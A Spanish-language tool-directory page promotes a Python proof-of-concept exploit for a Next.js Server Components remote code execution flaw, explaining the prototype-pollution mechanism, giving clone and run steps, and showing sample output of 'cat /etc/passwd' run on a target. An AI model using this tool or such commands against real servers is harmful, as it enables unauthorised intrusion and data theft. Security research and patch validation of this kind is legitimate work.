Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55182-PoC — React2Shell (CVE-2025-66478): Un concepto de prueba basado en Python para la Ejecución Remota de Código (RCE) crítica en los Componentes del Servidor de Next.js. Cuenta con una interfaz CLI interactiva, inyección de payload personalizada y un formato de salida más limpio. Solo con fines educativos de investigación. | Kitploit
Herramientas/GitHubGitHub/ravindurathnayaka/cve-2025-55182-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubravindurathnayaka/cve-2025-55182-poc

CVE-2025-55182-PoC

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
42hace 8 mesesAún no revisado

Acerca de

React2Shell (CVE-2025-66478): Un concepto de prueba basado en Python para la Ejecución Remota de Código (RCE) crítica en los Componentes del Servidor de Next.js. Cuenta con una interfaz CLI interactiva, inyección de payload personalizada y un formato de salida más limpio. Solo con fines educativos de investigación.

Compartir

⚡ React2Shell PoC de Exploit (CVE-2025-66478)

Ejecución Remota de Código (RCE) en Next.js mediante Contaminación de Prototipos en Componentes del Servidor

Python Exploit Type CVE


🕵️‍♂️ Descripción general

Este repositorio contiene una Prueba de Concepto (PoC) para CVE-2025-66478 (también referenciada como CVE-2025-55182 en algunos contextos), una vulnerabilidad crítica que afecta a aplicaciones Next.js que utilizan versiones específicas de React Server Components (RSC).

Al manipular el proceso de serialización de RSC, un atacante no autenticado puede inyectar una carga útil maliciosa mediante contaminación de prototipos (__proto__:then). Esto puede llevar a la ejecución de comandos arbitrarios del sistema en el servidor a través de child_process.execSync.

Desarrollado por: ArkhamKnight47


🚀 Características

  • CLI interactivo — Indicaciones simples para URL objetivo y comando.
  • Inyección de carga útil — Construye automáticamente la carga útil multipart/form-data requerida.
  • Limpieza inteligente de salida — Analiza respuestas JSON crudas y muestra solo la salida limpia del comando (por ejemplo, elimina 1:E{"digest":...}).
  • Tema Matrix — Estética verde sobre negro con banner de arte ASCII.
  • Multiplataforma — Maneja diferencias de saltos de línea (\n vs \r\n) para una salida limpia en objetivos Windows y Linux.

🛠️ Instalación y Uso

Requisitos previos

  • Python 3.x
  • Librería requests

Configuración

root@kitploit:~
# Clone the repository
git clone https://github.com/RavinduRathnayaka/CVE-2025-55182-PoC.git
cd CVE-2025-55182-PoC

# Install dependencies
pip install requests

Ejecución del Exploit

root@kitploit:~
python CVE-2025-66478.py

Se te solicitará:

  • URL objetivo — p. ej. http://localhost:3000
  • Comando — p. ej. id, whoami, cat /etc/passwd

📌 Ejemplo de salida

root@kitploit:~
[?] TARGET URL > http://192.168.1.5:3000
[?] COMMAND    > cat /etc/passwd

[*] EXECUTING EXPLOIT...
[+] PAYLOAD SUCCESSFUL. OUTPUT BELOW:
============================================================
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
nextjs:x:1001:65533::/home/nextjs:/sbin/nologin
============================================================

⚠️ Aviso legal

Esta herramienta se proporciona únicamente con fines educativos y de investigación en seguridad.

El autor (ArkhamKnight47) no asume ninguna responsabilidad por el mal uso de este código. Probar este exploit contra sistemas que no posees o para los cuales no tienes permiso explícito es ilegal y no ético.

  • ❌ No lo utilices contra sistemas en producción sin autorización
  • ✅ Úsalo para validar vulnerabilidades en tus propias aplicaciones
  • ✅ Úsalo para aprender sobre los riesgos de serialización RSC y contaminación de prototipos

Úsalo con responsabilidad. Aprende éticamente. Asegura tu stack.

Descargar herramienta